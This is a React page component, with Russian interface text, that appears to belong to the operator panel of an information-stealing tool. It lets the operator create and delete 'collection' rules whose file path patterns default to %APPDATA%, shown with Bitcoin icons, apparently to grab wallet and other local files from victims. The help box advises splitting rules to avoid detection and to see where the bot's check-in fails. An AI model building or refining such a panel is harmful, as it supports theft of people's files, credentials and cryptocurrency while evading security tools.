import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import toast from 'react-hot-toast';
import api, { cacheGet, cacheSet, listFrom } from '../api';

export default function CollectionDetail() {
  const { id } = useParams();
  const cached = cacheGet(`collection:${id}`, null);
  const [cat, setCat] = useState(() => cached?.cat || null);
  const [rules, setRules] = useState(() => cached?.rules || []);
  const [show, setShow] = useState(false);
  const [name, setName] = useState('');
  const [path, setPath] = useState('%APPDATA%\\');

  async function load() {
    try {
      const [c, r] = await Promise.all([
        api.get('/collection'),
        api.get(`/collection/${id}/rules`),
      ]);
      const cats = listFrom(c.data, 'categories');
      const nextCat = cats.find((x) => String(x.id) === String(id)) || { name: 'Правила', id };
      const nextRules = listFrom(r.data, 'rules');
      setCat(nextCat);
      setRules(nextRules);
      cacheSet(`collection:${id}`, { cat: nextCat, rules: nextRules });
      cacheSet('collection', cats);
    } catch (err) {
      toast.error('Ошибка');
      throw err;
    }
  }

  useEffect(() => {
    load().catch(() => {});
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [id]);

  async function addRule(e) {
    e.preventDefault();
    try {
      await api.post(`/collection/${id}/rules`, { name, path_pattern: path });
      setShow(false);
      setName('');
      toast.success('Правило добавлено');
      load();
    } catch {
      toast.error('Не удалось добавить правило');
    }
  }

  async function delRule(ruleId) {
    if (!window.confirm('Удалить правило?')) return;
    try {
      await api.delete(`/collection/rules/${ruleId}`);
      toast.success('Удалено');
      load();
    } catch {
      toast.error('Ошибка удаления');
    }
  }

  return (
    <div>
      <div className="rm-page-head">
        <div>
          <Link to="/collection" className="rm-link">← Назад</Link>
          <div className="rm-page-title" style={{ marginTop: 8 }}>{cat?.name || '…'}</div>
        </div>
        <button type="button" className="rm-btn primary" onClick={() => setShow(true)}>+ Правило</button>
      </div>

      <div className="rm-help">
        <b>Помощь</b>
        Правила работают с путями (path_pattern). Чем больше шагов — тем выше шанс детекта.
        Лучше дробить правила, чтобы видеть, на каком шаге отваливается отстук.
      </div>

      <div className="rm-rule-list">
        {rules.map((r) => (
          <div className="rm-rule" key={r.id}>
            <span className="handle">⋮⋮</span>
            <div className="ico" style={{ background: '#22C55E' }}>₿</div>
            <div className="meta">
              <b>{r.name}</b>
              <span>{r.path_pattern || '—'}</span>
            </div>
            <button type="button" className="rm-btn danger" onClick={() => delRule(r.id)}>Удалить</button>
          </div>
        ))}
        {!rules.length && <div className="rm-card rm-empty">Правил пока нет</div>}
      </div>

      {show && (
        <div className="rm-modal-bg" onClick={() => setShow(false)}>
          <form className="rm-modal" onClick={(e) => e.stopPropagation()} onSubmit={addRule}>
            <h3>Новое правило</h3>
            <div className="rm-field">
              <label>Название</label>
              <input value={name} onChange={(e) => setName(e.target.value)} required />
            </div>
            <div className="rm-field" style={{ marginTop: 10 }}>
              <label>Путь (path_pattern)</label>
              <input value={path} onChange={(e) => setPath(e.target.value)} required placeholder="%APPDATA%\\..." />
            </div>
            <div className="rm-modal-actions">
              <button type="button" className="rm-btn ghost" onClick={() => setShow(false)}>Отмена</button>
              <button type="submit" className="rm-btn primary">Сохранить</button>
            </div>
          </form>
        </div>
      )}
    </div>
  );
}
